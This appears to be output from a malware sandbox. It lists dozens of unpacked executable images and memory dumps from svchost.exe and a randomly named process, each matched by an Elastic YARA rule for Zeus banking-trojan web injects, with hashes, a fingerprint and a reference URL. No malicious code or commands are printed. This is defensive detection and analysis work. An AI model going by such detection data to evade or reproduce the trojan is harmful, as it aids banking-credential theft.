Source: 2.3.svchost.exe.b00000.70.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.85.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2500000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.60.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.71.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 39.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.e82000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 28.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2aa0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.78.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 31.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.28d2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 13.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2d60000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.59.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.54.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.70.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.84.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.52.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 22.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.a52000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 19.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.24b2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.54.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.58.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.e040000.40.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.79.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 6.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.1342000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.68.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 19.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.2550000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.e2c0000.39.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.55.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 36.2.ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe.27f2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.81.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.b00000.73.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1375813400.0000000002500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1946484273.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1991936635.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1729152425.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1742494940.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1945983887.0000000002700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1993648247.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1973545656.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000006.00000002.1835795519.00000000013E0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000008.00000002.1842592106.00000000014B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000000D.00000002.1895695128.0000000002D60000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
